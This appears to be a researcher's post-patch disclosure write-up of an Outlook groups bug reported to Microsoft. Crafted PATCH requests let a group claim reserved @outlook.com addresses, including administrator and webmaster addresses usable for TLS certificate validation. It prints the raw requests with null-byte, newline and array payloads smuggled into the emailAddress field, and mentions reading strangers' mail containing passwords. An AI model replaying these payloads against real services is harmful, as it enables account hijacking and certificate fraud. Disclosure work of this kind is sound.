msrc disc. (outlook exploit)

scheduled to be released oct 31st 2025. full disclosure as of march 15 2026

outlook is commonly used by a lot of companies to conduct corporate shit. one feature of outlook is the ability to make groups:

interestingly, outlook groups can receive mail (they basically act as seperate inboxes) from anywhere - they have an email address in the form of name@groups.outlook.com. in addition to this, personal (non-enterprise/ms365) mails also go through different endpoints when creating a new group. we’ll look at one of these endpoints today;ill publish something different for the ms365 one once i finalize a new report jajaja

PATCH /Speedway/v1.0/Groups

when creating a new group and finalizing the name for the email, the request looks something akin to this:

PATCH /Speedway/v1.0/Groups('OID:c8c90000-2952-4ca4-0000-000000000000@[REDACTED]-e9f6-40af-b435-aaaaaaaaaaaa') HTTP/2
Host: outlook.live.com
...
Referer: https://outlook.live.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"emailAddress":"helloworldserqwerqwerqwern@groups.outlook.com"}

one obvious vector is the emailAddress field. changing it to something like this:

PATCH /Speedway/v1.0/Groups('OID:c8c90000-2952-4ca4-0000-000000000000@[REDACTED]-e9f6-40af-b435-aaaaaaaaaaaa') HTTP/2
Host: outlook.live.com
...
Referer: https://outlook.live.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"emailAddress":"holy@outlook.com"}

works. trying to sign up for holy@outlook.com errors, showing that its ‘unavailable’. interesting!

testing the email out, i managed to sign up for an account on twitter:

obviously this means anyone that has signed up ofr an account on any platform before that have their outlook email somehow invalidated/reserved by outlook likely can get their account taken over using this tiny little vulnerability.

the only caveat with this however obv is the fact that we can only take accounts that are locked/reserved/glitched; we cannot take over existing inboxes. interestingly however, some existing inboxes that are ‘glitched’ (dont know how) will not be able to receive mail if we use the exploit to take over their inbox. interesting!

as a side note, these domains also worked:

• live.com
• msn.com
• windowslive.com

more stuff

clearly more can be done. as a starter, lets try taking over an existing inbox that isnt glitched. trying this on my own inbox:

PATCH /Speedway/v1.0/Groups('OID:c8c90000-2952-4ca4-0000-000000000000@[REDACTED]-e9f6-40af-b435-aaaaaaaaaaaa') HTTP/2
Host: outlook.live.com
...
Referer: https://outlook.live.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"emailAddress":"secret@outlook.com"}

returns a 400 bad request, saying that there was an error with claiming the email. trying this:

PATCH /Speedway/v1.0/Groups('OID:c8c90000-2952-4ca4-0000-000000000000@[REDACTED]-e9f6-40af-b435-aaaaaaaaaaaa') HTTP/2
Host: outlook.live.com
...
Referer: https://outlook.live.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"emailAddress":"holy%00@outlook.com"}

however, worked. it goes without saying however that any inbox with null bytes in them are heavily glitched to oblivion:

trying

PATCH /Speedway/v1.0/Groups('OID:c8c90000-2952-4ca4-0000-000000000000@[REDACTED]-e9f6-40af-b435-aaaaaaaaaaaa') HTTP/2
Host: outlook.live.com
...
Referer: https://outlook.live.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"emailAddress":"holy%2500@outlook.com"}

also yielded a similar result. as a side note, there may or may not be another vuln with the error window (you can probably guess what this is), but microsofts fixes alleviated this and seemingly also fixed the side vuln.

anyway lets try this:

PATCH /Speedway/v1.0/Groups('OID:c8c90000-2952-4ca4-0000-000000000000@[REDACTED]-e9f6-40af-b435-aaaaaaaaaaaa') HTTP/2
Host: outlook.live.com
...
Referer: https://outlook.live.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"emailAddress":"holy\u0000@outlook.com"}

this made my inbox completely unusable and at times load a responsecode=undefined page with broken css:

(side note: different email, same thingamabob you get the idea)

and the only way was to re-send the same request with some other name.

getting webmaster access, cert takeover

if you dont know what digicert is you should probably google it and come back lol. anyway, digicert is an cert authority that issues tls/ssl and code-signing certs. since ca’s basically are centralized vouching figures, taking over this would be pretty silly; since we can start impersonating.

one interesting thing about digicert is that it issues 2 kinds of digicert domain control validation (dcv) requests to verify you own the domain:

• setting a txt record (obv we cant do that in this situation)
• send an email to webmaster@domain.com or administrator/admin@domain.com im sure you can see what im getting at now. taking over administrator@outlook.com was pretty trivial, alongside taking over webmaster@msn.com, webmaster@live.com and administrator@msn.com:

PATCH /Speedway/v1.0/Groups/.....blah HTTP/2
Host: outlook.live.com
...
Referer: https://outlook.live.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"emailAddress":"administrator@outlook.com"}

and then tried multiple variations:

PATCH /Speedway/v1.0/Groups/.....blah HTTP/2
Host: outlook.live.com
...
Referer: https://outlook.live.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"emailAddress":"administrator%0A@outlook.com"}

etc..

all of which returned a 204. its wraps

interesting emails

taking over administrator@outlook.com and other webmaster mails was likely not a good idea; as i was bombarded by dcv requests from random companies:

and random emails from people thinking that administrator@outlook.com can help them get back in their old outlook account, alongside people who decide to send their passwords in their email. also some dumbass from taiwan signed up for a roblox acc with the email so idk lol. obv i wont show most of the emails here

i submitted a report to msrc after tinkering a bit more with the dcv idea and concluding that i can infact request and obtain ssl/tls certs for outlook.com

attempting to defeat the validator

over the next few days i tried bypassing their email normalization/canonicalization by trying different variations of null bytes, newlines, crlfs, random oid objects, malformed requests like:

PATCH /Speedway/v1.0/Groups/.....blah HTTP/2
Host: outlook.live.com
...
Referer: https://outlook.live.com/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"emailAddress": ["invalid@outlook.com", "accept_me@outlook.com"]}

and many many more. a few worked and gave really interesting responses but by the time i got around to fully figuring out a proper way to defeat the validator microsoft swiftly patched the vuln and started nuking group inboxes. so erm yepr

final

after reporting the bug months before, microsoft sent an update saying the exploit would be fully addressed by december. very speedy!